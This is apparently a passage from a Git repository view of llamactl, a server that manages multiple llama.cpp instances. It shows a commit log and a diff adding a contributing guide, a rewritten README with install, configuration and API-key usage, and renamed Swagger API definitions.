70 Commits

Author SHA1 Message Date
a6e3cb4a9b Merge pull request #23 from lordmathis/feat/start-on-request
feat: On-Demand Instance Start
2025-08-20 16:04:59 +02:00
9181c3d7bc Remove unused import from zodFormUtils.ts 2025-08-20 16:03:09 +02:00
1939b45312 Refactor WaitForHealthy method to use direct health check URL and simplify health check logic 2025-08-20 15:58:08 +02:00
8265a94bf7 Add on-demand start configuration to instance options and basic fields 2025-08-20 14:56:11 +02:00
4bc9362f7a Add default on-demand start settings and timeout configuration to README 2025-08-20 14:41:42 +02:00
ddb54763f6 Add OnDemandStartTimeout configuration and update OpenAIProxy to use it 2025-08-20 14:25:43 +02:00
496ab3aa5d Update README to clarify on-demand instance start feature 2025-08-20 14:22:55 +02:00
287a5e0817 Implement WaitForHealthy method and enhance OpenAIProxy to support on-demand instance start 2025-08-20 14:19:12 +02:00
7b4adfa0cd Add DefaultOnDemandStart configuration and update instance options 2025-08-20 13:50:43 +02:00
651c8b9b2c Merge pull request #22 from lordmathis/feat/timeout
feat: Implement idle instance timeout
2025-08-20 13:34:38 +02:00
7194e1fdd1 Update README to clarify idle timeout management and state persistence features 2025-08-20 13:32:03 +02:00
492c3ff270 Remove redundant timeout tests and improve test coverage for instance timeout validation 2025-08-20 13:25:56 +02:00
00a3cba717 Enhance shutdown handling in InstanceManager with proper synchronization and max instances check 2025-08-19 22:34:48 +02:00
eb1d4ab55f Enhance timeout functionality tests to validate configuration and logic without starting instances 2025-08-19 20:52:59 +02:00
a9e3801eae Refactor logging in checkAllTimeouts 2025-08-19 19:25:15 +02:00
1aaab96cec Add idle timeout configuration to instance options and basic fields 2025-08-19 19:24:54 +02:00
78eda77e44 Enhance timeout handling in InstanceManager with goroutine recovery and shutdown support 2025-08-17 22:49:28 +02:00
d70bb634cd Implement instance tests for timeout 2025-08-17 21:50:16 +02:00
41eaebc927 Add TimeoutCheckInterval to instance configuration in tests 2025-08-17 21:42:52 +02:00
c45fa13206 Initialize last request time on instance start and update timeout handling logic 2025-08-17 21:15:28 +02:00
5e3a28398d Implement periodic timeout checking for instances 2025-08-17 21:10:48 +02:00
c734bcae4a Move UpdateLastRequestTime method to timeout.go and add ShouldTimeout method for idle timeout handling 2025-08-17 20:37:20 +02:00
e4e7a82294 Implement last request time tracking for instance management 2025-08-17 19:44:57 +02:00
ccffbca6b2 Add timeout check interval and update instance configuration 2025-08-17 19:26:21 +02:00
902be409d5 Add IdleTimeout option to CreateInstanceOptions and update JSON handling 2025-08-17 19:06:09 +02:00
eb9599f26a Merge pull request #21 from lordmathis/feat/dark-mode
feat: Implement dark theme and theme switching
2025-08-11 17:56:16 +02:00
ebf8dfdeab Mock window.matchMedia for dark mode functionality in tests 2025-08-11 17:54:04 +02:00
f15c0840c4 Implement dark theme and theme switching 2025-08-11 17:39:56 +02:00
e702bcb694 Create CNAME 2025-08-08 13:41:58 +02:00
4895fbff15 Merge pull request #20 from lordmathis/docs/contributing
docs: Add CONTRIBUTING.md to outline development setup and contribution process
2025-08-07 21:13:01 +02:00
282fe67355 Add CONTRIBUTING.md to outline development setup and contribution process 2025-08-07 21:10:01 +02:00
96a36e1119 Merge pull request #19 from lordmathis/docs/readme-screenshot
docs: Add dashboard screenshot to README
2025-08-07 19:55:15 +02:00
759fc58326 Update README to include dashboard screenshot 2025-08-07 19:51:34 +02:00
afef3d0180 Update import path for API documentation to use apidocs 2025-08-07 19:48:28 +02:00
a87652937f Move swagger documentation to apidoc 2025-08-07 19:48:03 +02:00
7bde12db47 Merge pull request #18 from lordmathis/feat/show-version
feat: Show app version on backend and frontend
2025-08-07 19:11:58 +02:00
e2b64620b5 Expose version endpoint 2025-08-07 19:10:06 +02:00
3ba62af01a Add VITE_APP_VERSION to environment and update SystemInfoDialog to display version 2025-08-07 19:01:31 +02:00
0150429e82 Add commit hash and build time to version output 2025-08-07 18:48:35 +02:00
2ecf096024 Add version flag to display llamactl version 2025-08-07 18:46:49 +02:00
5aed01b68f Merge pull request #17 from lordmathis/fix/forbidden-logs
fix: Refactor log fetching to use instancesApi
2025-08-06 19:12:34 +02:00
3f9caff33b Refactor log fetching to use instancesApi 2025-08-06 19:07:25 +02:00
169254c61a Merge pull request #16 from lordmathis/fix/llama-server-options
fix: Missing or wrong llama server options
2025-08-06 18:51:18 +02:00
8154b8d0ab Fix temp in tests 2025-08-06 18:49:36 +02:00
a26d853ad5 Fix missing or wrong llama server options on frontend 2025-08-06 18:40:05 +02:00
6203b64045 Fix missing or wrong llama server options 2025-08-06 18:31:17 +02:00
8d9c808be1 Merge pull request #14 from lordmathis/docs/readme-updates
docs: Update README.md to improve project description
2025-08-05 21:32:20 +02:00
161cd213c5 Update README.md to enhance project description and installation instructions 2025-08-05 21:20:37 +02:00
d6e84f0527 Merge pull request #13 from lordmathis/fix/decimal-input
fix: Allow decimal input for numeric fields in instance configuration
2025-08-05 20:03:31 +02:00
0846350d41 Fix eslint issues in ZodFormField 2025-08-05 19:21:09 +02:00
dacaca8594 Fix number input handling to allow decimal values 2025-08-05 19:15:12 +02:00
6e3f5cec61 Merge pull request #12 from lordmathis/refactor/pkg-restructure
Pkg restructure
2025-08-04 20:48:18 +02:00
85b3638efb Update ValidateInstanceName to return the validated name and modify tests accordingly 2025-08-04 20:46:15 +02:00
934d1c5aaa Refactor instance management by moving operations to a new file 2025-08-04 20:38:57 +02:00
2abe9c282e Rename config and instance struct to avoid awkward naming 2025-08-04 19:30:50 +02:00
6a7a9a2d09 Split large package into subpackages 2025-08-04 19:23:56 +02:00
a3c44dad1e Merge pull request #11 from lordmathis/feat/state-persistance
feat: Persist instances configs across app restarts
2025-08-02 23:47:35 +02:00
7426008ef9 Use instance directly in DeleteInstance 2025-08-02 23:35:03 +02:00
cf26aa521a Update README.md to enhance API Key authentication section and provide usage examples 2025-08-02 23:15:25 +02:00
d94c922314 Update README.md for data persistence features 2025-08-02 23:02:30 +02:00
3cbd23a6e2 Implement persistence tests 2025-08-02 22:52:50 +02:00
bed172bf73 Implement instance loading and auto-start functionality on manager initialization 2025-08-02 21:39:19 +02:00
d449255bc9 Persist instance state after starting and stopping instances 2025-08-02 21:23:31 +02:00
de89d0673a Implement instance persistence with JSON file storage and deletion 2025-08-02 21:09:16 +02:00
dd6ffa548c Refactor configuration structure to replace DataConfig with instance-specific directories and auto-creation options 2025-08-02 19:10:40 +02:00
7935f19cc1 Add data directory configuration with auto-creation option 2025-08-02 15:33:33 +02:00
f1718198a3 Merge pull request #10 from lordmathis/fix/graceful-shutdown
Implement graceful shutdown
2025-08-01 23:44:58 +02:00
b24d744cad Implement graceful shutdown for the server and add Shutdown method to InstanceManager 2025-08-01 23:41:18 +02:00
fff8b2dbde Merge pull request #9 from lordmathis/docs/add-prebuilt-install-instructions
Update installation instructions in README.md to include prebuilt binaries
2025-08-01 20:23:54 +02:00
b94909dee4 Update installation instructions in README.md to include prebuilt binaries and manual download steps 2025-08-01 20:17:29 +02:00
47 changed files with 2745 additions and 1721 deletions


@@ -29,6 +29,8 @@ jobs:
npm ci
- name: Build Web UI
env:
VITE_APP_VERSION: ${{ github.ref_name }}
run: |
cd webui
npm run build

CNAME Normal file

@@ -0,0 +1 @@
llamactl.org

CONTRIBUTING.md Normal file

@@ -0,0 +1,138 @@
# Contributing to Llamactl
Thank you for considering contributing to Llamactl! This document outlines the development setup and contribution process.
## Development Setup
### Prerequisites
- Go 1.24 or later
- Node.js 22 or later
- `llama-server` executable (from [llama.cpp](https://github.com/ggml-org/llama.cpp))
### Getting Started
1. **Clone the repository**
```bash
git clone https://github.com/lordmathis/llamactl.git
cd llamactl
```
2. **Install dependencies**
```bash
# Go dependencies
go mod download
# Frontend dependencies
cd webui && npm ci && cd ..
```
3. **Run for development**
```bash
# Start backend server
go run ./cmd/server
```
Server will be available at `http://localhost:8080`
```bash
# In a separate terminal, start frontend dev server
cd webui && npm run dev
```
Development UI will be available at `http://localhost:5173`
4. **Common development commands**
```bash
# Backend
go test ./... -v # Run tests
go test -race ./... -v # Run with race detector
go fmt ./... && go vet ./... # Format and vet code
# Frontend (run from webui/ directory)
npm run test:run # Run tests once
npm run test # Run tests in watch mode
npm run type-check # TypeScript type checking
npm run lint:fix # Lint and fix issues
```
## Before Submitting a Pull Request
### Required Checks
All of the following must pass:
1. **Backend**
```bash
go test ./... -v
go test -race ./... -v
go fmt ./... && go vet ./...
go build -o llamactl ./cmd/server
```
2. **Frontend**
```bash
cd webui
npm run test:run
npm run type-check
npm run build
```
### API Documentation
If changes affect API endpoints, update Swagger documentation:
```bash
# Install swag if needed
go install github.com/swaggo/swag/cmd/swag@latest
# Update Swagger comments in pkg/server/handlers.go
# Then regenerate docs
swag init -g cmd/server/main.go -o apidocs
```
## Pull Request Guidelines
### Pull Request Titles
Use this format for pull request titles:
- `feat:` for new features
- `fix:` for bug fixes
- `docs:` for documentation changes
- `test:` for test additions or modifications
- `refactor:` for code refactoring
### Submission Process
1. Create a feature branch from `main`
2. Make changes following the coding standards
3. Run all required checks listed above
4. Update documentation if necessary
5. Submit pull request with:
- Clear description of changes
- Reference to any related issues
- Screenshots for UI changes
## Code Style and Testing
### Testing Strategy
- Backend tests use Go's built-in testing framework
- Frontend tests use Vitest and React Testing Library
- Run tests frequently during development
- Add tests for new features and bug fixes
### Go
- Follow standard Go formatting (`go fmt`)
- Use meaningful variable and function names
- Add comments for exported functions and types
- Handle errors appropriately
### TypeScript/React
- Use TypeScript strictly (avoid `any` when possible)
- Follow React hooks best practices
- Use meaningful component and variable names
- Prefer functional components over class components
## Getting Help
- Check existing [issues](https://github.com/lordmathis/llamactl/issues)
- Review the [README.md](README.md) for usage documentation
- Look at existing code for patterns and conventions
Thank you for contributing to Llamactl!

README.md

@@ -2,93 +2,159 @@
![Build and Release](https://github.com/lordmathis/llamactl/actions/workflows/release.yaml/badge.svg) ![Go Tests](https://github.com/lordmathis/llamactl/actions/workflows/go_test.yaml/badge.svg) ![WebUI Tests](https://github.com/lordmathis/llamactl/actions/workflows/webui_test.yaml/badge.svg)
A control server for managing multiple Llama Server instances with a web-based dashboard.
**Management server and proxy for multiple llama.cpp instances with OpenAI-compatible API routing.**
## Features
## Why llamactl?
- **Multi-instance Management**: Create, start, stop, restart, and delete multiple llama-server instances
- **Web Dashboard**: Modern React-based UI for managing instances
- **Auto-restart**: Configurable automatic restart on instance failure
- **Instance Monitoring**: Real-time health checks and status monitoring
- **Log Management**: View, search, and download instance logs
- **REST API**: Full API for programmatic control
- **OpenAI Compatible**: Route requests to instances by instance name
- **Configuration Management**: Comprehensive llama-server parameter support
- **System Information**: View llama-server version, devices, and help
🚀 **Multiple Model Serving**: Run different models simultaneously (7B for speed, 70B for quality)
🔗 **OpenAI API Compatible**: Drop-in replacement - route requests by model name
🌐 **Web Dashboard**: Modern React UI for visual management (unlike CLI-only tools)
🔐 **API Key Authentication**: Separate keys for management vs inference access
📊 **Instance Monitoring**: Health checks, auto-restart, log management
**Idle Timeout Management**: Automatically stop idle instances after a configurable period
💡 **On-Demand Instance Start**: Automatically launch instances upon receiving OpenAI-compatible API requests
💾 **State Persistence**: Ensure instances remain intact across server restarts
## Prerequisites
![Dashboard Screenshot](docs/images/screenshot.png)
This project requires `llama-server` from llama.cpp to be installed and available in your PATH.
**Choose llamactl if**: You need authentication, health monitoring, auto-restart, and centralized management of multiple llama-server instances
**Choose Ollama if**: You want the simplest setup with strong community ecosystem and third-party integrations
**Choose LM Studio if**: You prefer a polished desktop GUI experience with easy model management
**Install llama.cpp:**
Follow the installation instructions at https://github.com/ggml-org/llama.cpp
## Quick Start
```bash
# 1. Install llama-server (one-time setup)
# See: https://github.com/ggml-org/llama.cpp#quick-start
# 2. Download and run llamactl
LATEST_VERSION=$(curl -s https://api.github.com/repos/lordmathis/llamactl/releases/latest | grep '"tag_name":' | sed -E 's/.*"([^"]+)".*/\1/')
curl -L https://github.com/lordmathis/llamactl/releases/download/${LATEST_VERSION}/llamactl-${LATEST_VERSION}-linux-amd64.tar.gz | tar -xz
sudo mv llamactl /usr/local/bin/
# 3. Start the server
llamactl
# Access dashboard at http://localhost:8080
```
## Usage
### Create and manage instances via web dashboard:
1. Open http://localhost:8080
2. Click "Create Instance"
3. Set model path and GPU layers
4. Start or stop the instance
### Or use the REST API:
```bash
# Create instance
curl -X POST localhost:8080/api/v1/instances/my-7b-model \
-H "Authorization: Bearer your-key" \
-d '{"model": "/path/to/model.gguf", "gpu_layers": 32}'
# Use with OpenAI SDK
curl -X POST localhost:8080/v1/chat/completions \
-H "Authorization: Bearer your-key" \
-d '{"model": "my-7b-model", "messages": [{"role": "user", "content": "Hello!"}]}'
```
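The new idle timeout and on-demand start features can also be configured per instance. A sketch, assuming `CreateInstanceOptions` exposes them as `on_demand_start` and `idle_timeout` (in minutes) — check the actual schema before relying on these names:
```bash
# Hypothetical per-instance overrides for on-demand start and idle timeout
curl -X POST localhost:8080/api/v1/instances/my-7b-model \
  -H "Authorization: Bearer your-key" \
  -d '{"model": "/path/to/model.gguf", "on_demand_start": true, "idle_timeout": 30}'
```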
## Installation
### Build Requirements
- Go 1.24 or later
- Node.js 22 or later (for building the web UI)
### Building with Web UI
### Option 1: Download Binary (Recommended)
```bash
# Clone the repository
# Linux/macOS - Get latest version and download
LATEST_VERSION=$(curl -s https://api.github.com/repos/lordmathis/llamactl/releases/latest | grep '"tag_name":' | sed -E 's/.*"([^"]+)".*/\1/')
curl -L https://github.com/lordmathis/llamactl/releases/download/${LATEST_VERSION}/llamactl-${LATEST_VERSION}-$(uname -s | tr '[:upper:]' '[:lower:]')-$(uname -m).tar.gz | tar -xz
sudo mv llamactl /usr/local/bin/
# Or download manually from the releases page:
# https://github.com/lordmathis/llamactl/releases/latest
# Windows - Download from releases page
```
### Option 2: Build from Source
Requires Go 1.24+ and Node.js 22+
```bash
git clone https://github.com/lordmathis/llamactl.git
cd llamactl
# Install Node.js dependencies
cd webui
npm ci
# Build the web UI
npm run build
# Return to project root and build
cd ..
cd webui && npm ci && npm run build && cd ..
go build -o llamactl ./cmd/server
```
# Run the server
./llamactl
## Prerequisites
You need `llama-server` from [llama.cpp](https://github.com/ggml-org/llama.cpp) installed:
```bash
# Quick install methods:
# Homebrew (macOS)
brew install llama.cpp
# Or build from source - see llama.cpp docs
```
## Configuration
llamactl works out of the box with sensible defaults.
```yaml
server:
host: "0.0.0.0" # Server host to bind to
port: 8080 # Server port to bind to
allowed_origins: ["*"] # Allowed CORS origins (default: all)
enable_swagger: false # Enable Swagger UI for API docs
instances:
port_range: [8000, 9000] # Port range for instances
data_dir: ~/.local/share/llamactl # Data directory (platform-specific, see below)
configs_dir: ~/.local/share/llamactl/instances # Instance configs directory
logs_dir: ~/.local/share/llamactl/logs # Logs directory
auto_create_dirs: true # Auto-create data/config/logs dirs if missing
max_instances: -1 # Max instances (-1 = unlimited)
llama_executable: llama-server # Path to llama-server executable
default_auto_restart: true # Auto-restart new instances by default
default_max_restarts: 3 # Max restarts for new instances
default_restart_delay: 5 # Restart delay (seconds) for new instances
default_on_demand_start: true # Default on-demand start setting
on_demand_start_timeout: 120 # Default on-demand start timeout in seconds
timeout_check_interval: 5 # Idle instance timeout check interval in minutes
auth:
require_inference_auth: true # Require auth for inference endpoints
inference_keys: [] # Keys for inference endpoints
require_management_auth: true # Require auth for management endpoints
management_keys: [] # Keys for management endpoints
```
<details><summary><strong>Full Configuration Guide</strong></summary>
llamactl can be configured via configuration files or environment variables. Configuration is loaded in the following order of precedence:
1. Hardcoded defaults
2. Configuration file
3. Environment variables
```
Defaults < Configuration file < Environment variables
```
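For example, a port set in the config file is overridden by the corresponding environment variable:
```bash
# Environment variables take precedence over the config file
echo 'server: {port: 8081}' > llamactl.yaml
LLAMACTL_PORT=9090 ./llamactl   # listens on 9090, not 8081
```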
### Configuration Files
Configuration files are searched in the following locations:
#### Configuration File Locations
Configuration files are searched in the following locations (in order of precedence):
**Linux/macOS:**
- `./llamactl.yaml` or `./config.yaml` (current directory)
- `~/.config/llamactl/config.yaml`
- `$HOME/.config/llamactl/config.yaml`
- `/etc/llamactl/config.yaml`
**Windows:**
- `./llamactl.yaml` or `./config.yaml` (current directory)
- `%APPDATA%\llamactl\config.yaml`
- `%USERPROFILE%\llamactl\config.yaml`
- `%PROGRAMDATA%\llamactl\config.yaml`
You can specify the config file path with the `LLAMACTL_CONFIG_PATH` environment variable.
## API Key Authentication
llamactl now supports API key authentication for both management and inference (OpenAI-compatible) endpoints. There are separate keys for the management and inference APIs: management keys grant full access, while inference keys only grant access to the OpenAI-compatible endpoints.
**How to Use:**
- Pass your API key in requests using one of:
- `Authorization: Bearer <key>` header
- `X-API-Key: <key>` header
- `api_key=<key>` query parameter
**Auto-generated keys**: If no keys are set and authentication is required, a key will be generated and printed to the terminal at startup. For production, set your own keys in config or environment variables.
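For example, all three of the following requests authenticate with the same inference key:
```bash
# Equivalent ways to pass an inference API key
BODY='{"model": "my-instance", "messages": [{"role": "user", "content": "Hello!"}]}'
curl -X POST localhost:8080/v1/chat/completions -H "Authorization: Bearer sk-inference-abc123" -d "$BODY"
curl -X POST localhost:8080/v1/chat/completions -H "X-API-Key: sk-inference-abc123" -d "$BODY"
curl -X POST "localhost:8080/v1/chat/completions?api_key=sk-inference-abc123" -d "$BODY"
```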
You can specify the config file path with the `LLAMACTL_CONFIG_PATH` environment variable.
### Configuration Options
@@ -112,25 +178,38 @@ server:
```yaml
instances:
port_range: [8000, 9000] # Port range for instances
log_directory: "/tmp/llamactl" # Directory for instance logs
max_instances: -1 # Maximum instances (-1 = unlimited)
llama_executable: "llama-server" # Path to llama-server executable
default_auto_restart: true # Default auto-restart setting
default_max_restarts: 3 # Default maximum restart attempts
default_restart_delay: 5 # Default restart delay in seconds
port_range: [8000, 9000] # Port range for instances (default: [8000, 9000])
data_dir: "~/.local/share/llamactl" # Directory for all llamactl data (default varies by OS)
configs_dir: "~/.local/share/llamactl/instances" # Directory for instance configs (default: data_dir/instances)
logs_dir: "~/.local/share/llamactl/logs" # Directory for instance logs (default: data_dir/logs)
auto_create_dirs: true # Automatically create data/config/logs directories (default: true)
max_instances: -1 # Maximum instances (-1 = unlimited)
llama_executable: "llama-server" # Path to llama-server executable
default_auto_restart: true # Default auto-restart setting
default_max_restarts: 3 # Default maximum restart attempts
default_restart_delay: 5 # Default restart delay in seconds
default_on_demand_start: true # Default on-demand start setting
on_demand_start_timeout: 120 # Default on-demand start timeout in seconds
timeout_check_interval: 5 # Default instance timeout check interval in minutes
```
**Environment Variables:**
- `LLAMACTL_INSTANCE_PORT_RANGE` - Port range (format: "8000-9000" or "8000,9000")
- `LLAMACTL_LOG_DIR` - Log directory path
- `LLAMACTL_DATA_DIRECTORY` - Data directory path
- `LLAMACTL_INSTANCES_DIR` - Instance configs directory path
- `LLAMACTL_LOGS_DIR` - Log directory path
- `LLAMACTL_AUTO_CREATE_DATA_DIR` - Auto-create data/config/logs directories (true/false)
- `LLAMACTL_MAX_INSTANCES` - Maximum number of instances
- `LLAMACTL_LLAMA_EXECUTABLE` - Path to llama-server executable
- `LLAMACTL_DEFAULT_AUTO_RESTART` - Default auto-restart setting (true/false)
- `LLAMACTL_DEFAULT_MAX_RESTARTS` - Default maximum restarts
- `LLAMACTL_DEFAULT_RESTART_DELAY` - Default restart delay in seconds
- `LLAMACTL_DEFAULT_ON_DEMAND_START` - Default on-demand start setting (true/false)
- `LLAMACTL_ON_DEMAND_START_TIMEOUT` - Default on-demand start timeout in seconds
- `LLAMACTL_TIMEOUT_CHECK_INTERVAL` - Default instance timeout check interval in minutes
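For example, to relocate instance data and tune the new timeout settings without a config file (values illustrative):
```bash
# Override selected instance settings via environment variables
LLAMACTL_INSTANCES_DIR=/srv/llamactl/instances \
LLAMACTL_LOGS_DIR=/srv/llamactl/logs \
LLAMACTL_ON_DEMAND_START_TIMEOUT=300 \
LLAMACTL_TIMEOUT_CHECK_INTERVAL=10 \
./llamactl
```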
#### Auth Configuration
#### Authentication Configuration
```yaml
auth:
@@ -146,121 +225,8 @@ auth:
- `LLAMACTL_REQUIRE_MANAGEMENT_AUTH` - Require auth for management endpoints (true/false)
- `LLAMACTL_MANAGEMENT_KEYS` - Comma-separated management API keys
### Example Configuration
```yaml
server:
host: "0.0.0.0"
port: 8080
instances:
port_range: [8001, 8100]
log_directory: "/var/log/llamactl"
max_instances: 10
llama_executable: "/usr/local/bin/llama-server"
default_auto_restart: true
default_max_restarts: 5
default_restart_delay: 10
auth:
require_inference_auth: true
inference_keys: ["sk-inference-abc123"]
require_management_auth: true
management_keys: ["sk-management-xyz456"]
```
## Usage
### Starting the Server
```bash
# Start with default configuration
./llamactl
# Start with custom config file
LLAMACTL_CONFIG_PATH=/path/to/config.yaml ./llamactl
# Start with environment variables
LLAMACTL_PORT=9090 LLAMACTL_LOG_DIR=/custom/logs ./llamactl
```
### Web Dashboard
Open your browser and navigate to `http://localhost:8080` to access the web dashboard.
### API Usage
The REST API is available at `http://localhost:8080/api/v1`. See the Swagger documentation at `http://localhost:8080/swagger/` for complete API reference.
#### Create an Instance
```bash
curl -X POST http://localhost:8080/api/v1/instances/my-instance \
-H "Content-Type: application/json" \
-d '{
"model": "/path/to/model.gguf",
"gpu_layers": 32,
"auto_restart": true
}'
```
#### List Instances
```bash
curl http://localhost:8080/api/v1/instances
```
#### Start/Stop Instance
```bash
# Start
curl -X POST http://localhost:8080/api/v1/instances/my-instance/start
# Stop
curl -X POST http://localhost:8080/api/v1/instances/my-instance/stop
```
### OpenAI Compatible Endpoints
Route requests to instances by including the instance name as the model parameter:
```bash
curl -X POST http://localhost:8080/v1/chat/completions \
-H "Content-Type: application/json" \
-d '{
"model": "my-instance",
"messages": [{"role": "user", "content": "Hello!"}]
}'
```
## Development
### Running Tests
```bash
# Go tests
go test ./...
# Web UI tests
cd webui
npm test
```
### Development Server
```bash
# Start Go server in development mode
go run ./cmd/server
# Start web UI development server (in another terminal)
cd webui
npm run dev
```
## API Documentation
Interactive API documentation is available at `http://localhost:8080/swagger/` when the server is running.
</details>
## License
This project is licensed under the MIT License. See the [LICENSE](LICENSE) file for details.
MIT License - see [LICENSE](LICENSE) file.


@@ -1,5 +1,5 @@
// Package docs Code generated by swaggo/swag. DO NOT EDIT
package docs
// Package apidocs Code generated by swaggo/swag. DO NOT EDIT
package apidocs
import "github.com/swaggo/swag"
@@ -37,7 +37,7 @@ const docTemplate = `{
"schema": {
"type": "array",
"items": {
"$ref": "#/definitions/llamactl.Instance"
"$ref": "#/definitions/instance.Process"
}
}
},
@@ -75,7 +75,7 @@ const docTemplate = `{
"200": {
"description": "Instance details",
"schema": {
"$ref": "#/definitions/llamactl.Instance"
"$ref": "#/definitions/instance.Process"
}
},
"400": {
@@ -120,7 +120,7 @@ const docTemplate = `{
"in": "body",
"required": true,
"schema": {
"$ref": "#/definitions/llamactl.CreateInstanceOptions"
"$ref": "#/definitions/instance.CreateInstanceOptions"
}
}
],
@@ -128,7 +128,7 @@ const docTemplate = `{
"200": {
"description": "Updated instance details",
"schema": {
"$ref": "#/definitions/llamactl.Instance"
"$ref": "#/definitions/instance.Process"
}
},
"400": {
@@ -173,7 +173,7 @@ const docTemplate = `{
"in": "body",
"required": true,
"schema": {
"$ref": "#/definitions/llamactl.CreateInstanceOptions"
"$ref": "#/definitions/instance.CreateInstanceOptions"
}
}
],
@@ -181,7 +181,7 @@ const docTemplate = `{
"201": {
"description": "Created instance details",
"schema": {
"$ref": "#/definitions/llamactl.Instance"
"$ref": "#/definitions/instance.Process"
}
},
"400": {
@@ -401,7 +401,7 @@ const docTemplate = `{
"200": {
"description": "Restarted instance details",
"schema": {
"$ref": "#/definitions/llamactl.Instance"
"$ref": "#/definitions/instance.Process"
}
},
"400": {
@@ -444,7 +444,7 @@ const docTemplate = `{
"200": {
"description": "Started instance details",
"schema": {
"$ref": "#/definitions/llamactl.Instance"
"$ref": "#/definitions/instance.Process"
}
},
"400": {
@@ -487,7 +487,7 @@ const docTemplate = `{
"200": {
"description": "Stopped instance details",
"schema": {
"$ref": "#/definitions/llamactl.Instance"
"$ref": "#/definitions/instance.Process"
}
},
"400": {
@@ -639,7 +639,35 @@ const docTemplate = `{
"200": {
"description": "List of OpenAI-compatible instances",
"schema": {
"$ref": "#/definitions/llamactl.OpenAIListInstancesResponse"
"$ref": "#/definitions/server.OpenAIListInstancesResponse"
}
},
"500": {
"description": "Internal Server Error",
"schema": {
"type": "string"
}
}
}
}
},
"/version": {
"get": {
"security": [
{
"ApiKeyAuth": []
}
],
"description": "Returns the version of the llamactl command",
"tags": [
"version"
],
"summary": "Get llamactl version",
"responses": {
"200": {
"description": "Version information",
"schema": {
"type": "string"
}
},
"500": {
@@ -653,7 +681,7 @@ const docTemplate = `{
}
},
"definitions": {
"llamactl.CreateInstanceOptions": {
"instance.CreateInstanceOptions": {
"type": "object",
"properties": {
"alias": {
@@ -751,7 +779,6 @@ const docTemplate = `{
"type": "string"
},
"draft_max": {
"description": "Speculative decoding params",
"type": "integer"
},
"draft_min": {
@@ -955,7 +982,7 @@ const docTemplate = `{
"type": "boolean"
},
"no_context_shift": {
"description": "Server/Example-specific params",
"description": "Example-specific params",
"type": "boolean"
},
"no_escape": {
@@ -1027,10 +1054,10 @@ const docTemplate = `{
"presence_penalty": {
"type": "number"
},
"priority": {
"prio": {
"type": "integer"
},
"priority_batch": {
"prio_batch": {
"type": "integer"
},
"props": {
@@ -1101,7 +1128,7 @@ const docTemplate = `{
"ssl_key_file": {
"type": "string"
},
"temperature": {
"temp": {
"type": "number"
},
"tensor_split": {
@@ -1167,7 +1194,7 @@ const docTemplate = `{
}
}
},
"llamactl.Instance": {
"instance.Process": {
"type": "object",
"properties": {
"created": {
@@ -1183,7 +1210,7 @@ const docTemplate = `{
}
}
},
"llamactl.OpenAIInstance": {
"server.OpenAIInstance": {
"type": "object",
"properties": {
"created": {
@@ -1200,13 +1227,13 @@ const docTemplate = `{
}
}
},
"llamactl.OpenAIListInstancesResponse": {
"server.OpenAIListInstancesResponse": {
"type": "object",
"properties": {
"data": {
"type": "array",
"items": {
"$ref": "#/definitions/llamactl.OpenAIInstance"
"$ref": "#/definitions/server.OpenAIInstance"
}
},
"object": {


@@ -30,7 +30,7 @@
"schema": {
"type": "array",
"items": {
"$ref": "#/definitions/llamactl.Instance"
"$ref": "#/definitions/instance.Process"
}
}
},
@@ -68,7 +68,7 @@
"200": {
"description": "Instance details",
"schema": {
"$ref": "#/definitions/llamactl.Instance"
"$ref": "#/definitions/instance.Process"
}
},
"400": {
@@ -113,7 +113,7 @@
"in": "body",
"required": true,
"schema": {
"$ref": "#/definitions/llamactl.CreateInstanceOptions"
"$ref": "#/definitions/instance.CreateInstanceOptions"
}
}
],
@@ -121,7 +121,7 @@
"200": {
"description": "Updated instance details",
"schema": {
"$ref": "#/definitions/llamactl.Instance"
"$ref": "#/definitions/instance.Process"
}
},
"400": {
@@ -166,7 +166,7 @@
"in": "body",
"required": true,
"schema": {
"$ref": "#/definitions/llamactl.CreateInstanceOptions"
"$ref": "#/definitions/instance.CreateInstanceOptions"
}
}
],
@@ -174,7 +174,7 @@
"201": {
"description": "Created instance details",
"schema": {
"$ref": "#/definitions/llamactl.Instance"
"$ref": "#/definitions/instance.Process"
}
},
"400": {
@@ -394,7 +394,7 @@
"200": {
"description": "Restarted instance details",
"schema": {
"$ref": "#/definitions/llamactl.Instance"
"$ref": "#/definitions/instance.Process"
}
},
"400": {
@@ -437,7 +437,7 @@
"200": {
"description": "Started instance details",
"schema": {
"$ref": "#/definitions/llamactl.Instance"
"$ref": "#/definitions/instance.Process"
}
},
"400": {
@@ -480,7 +480,7 @@
"200": {
"description": "Stopped instance details",
"schema": {
"$ref": "#/definitions/llamactl.Instance"
"$ref": "#/definitions/instance.Process"
}
},
"400": {
@@ -632,7 +632,35 @@
"200": {
"description": "List of OpenAI-compatible instances",
"schema": {
"$ref": "#/definitions/llamactl.OpenAIListInstancesResponse"
"$ref": "#/definitions/server.OpenAIListInstancesResponse"
}
},
"500": {
"description": "Internal Server Error",
"schema": {
"type": "string"
}
}
}
}
},
"/version": {
"get": {
"security": [
{
"ApiKeyAuth": []
}
],
"description": "Returns the version of the llamactl command",
"tags": [
"version"
],
"summary": "Get llamactl version",
"responses": {
"200": {
"description": "Version information",
"schema": {
"type": "string"
}
},
"500": {
@@ -646,7 +674,7 @@
}
},
"definitions": {
"llamactl.CreateInstanceOptions": {
"instance.CreateInstanceOptions": {
"type": "object",
"properties": {
"alias": {
@@ -744,7 +772,6 @@
"type": "string"
},
"draft_max": {
"description": "Speculative decoding params",
"type": "integer"
},
"draft_min": {
@@ -948,7 +975,7 @@
"type": "boolean"
},
"no_context_shift": {
"description": "Server/Example-specific params",
"description": "Example-specific params",
"type": "boolean"
},
"no_escape": {
@@ -1020,10 +1047,10 @@
"presence_penalty": {
"type": "number"
},
"priority": {
"prio": {
"type": "integer"
},
"priority_batch": {
"prio_batch": {
"type": "integer"
},
"props": {
@@ -1094,7 +1121,7 @@
"ssl_key_file": {
"type": "string"
},
"temperature": {
"temp": {
"type": "number"
},
"tensor_split": {
@@ -1160,7 +1187,7 @@
}
}
},
"llamactl.Instance": {
"instance.Process": {
"type": "object",
"properties": {
"created": {
@@ -1176,7 +1203,7 @@
}
}
},
"llamactl.OpenAIInstance": {
"server.OpenAIInstance": {
"type": "object",
"properties": {
"created": {
@@ -1193,13 +1220,13 @@
}
}
},
"llamactl.OpenAIListInstancesResponse": {
"server.OpenAIListInstancesResponse": {
"type": "object",
"properties": {
"data": {
"type": "array",
"items": {
"$ref": "#/definitions/llamactl.OpenAIInstance"
"$ref": "#/definitions/server.OpenAIInstance"
}
},
"object": {


@@ -1,6 +1,6 @@
basePath: /api/v1
definitions:
